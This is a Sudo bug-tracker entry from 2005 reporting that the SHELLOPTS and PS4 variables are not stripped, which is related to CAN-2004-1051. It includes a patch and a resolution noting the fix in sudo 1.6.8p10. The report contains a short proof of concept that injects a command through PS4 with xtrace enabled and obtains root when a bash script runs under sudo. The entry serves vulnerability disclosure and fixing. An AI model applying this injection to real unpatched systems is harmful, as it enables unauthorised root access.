First Last Prev Next    This bug is not in your last search results.
Bug 182 - unstripped variables
unstripped variables
Status: RESOLVED FIXED
Product: Sudo
Classification: Unclassified
Component: Sudo
1.6.8
PC Linux
: normal normal
Assigned To: Todd C. Miller
Depends on:
Blocks:
  Show dependency treegraph
 
Reported: 2005-06-05 13:40 MDT by Tavis Ormandy
Modified: 2005-10-28 14:39 MDT (History)
0 users

See Also:

Attachments
patch to nix PS4 and SHELLOPTS irt CAN-2004-1051 (216 bytes, patch)
2005-10-27 14:57 MDT, Scott Doty 		Details | Diff
Add an attachment (proposed patch, testcase, etc.)

Note You need to log in before you can comment on or make changes to this bug.
Description Tavis Ormandy 2005-06-05 13:40:52 MDT 
regarding CAN-2004-1051, I suppose SHELLOPTS should also be stripped for 
completeness.

$ csh # SHELLOPTS is marked readonly in bash.
% setenv SHELLOPTS xtrace
% setenv PS4 '$(id)'
% sudo /any/bash/script
uid=0(root) gid=0(root) groups=0(root)
...
Comment 1 Scott Doty 2005-10-27 14:57:07 MDT 
Created attachment 39 [details]
patch to nix PS4 and SHELLOPTS irt CAN-2004-1051

patch to nix PS4 and SHELLOPTS irt CAN-2004-1051

maybe the mandiva folks should have submitted this... (see bugtraq for
their security notice)

 -Scott Doty <scott@sonic.net>
Comment 2 Todd C. Miller 2005-10-28 12:39:40 MDT 
Fixed in sudo 1.6.8p10
First Last Prev Next    This bug is not in your last search results.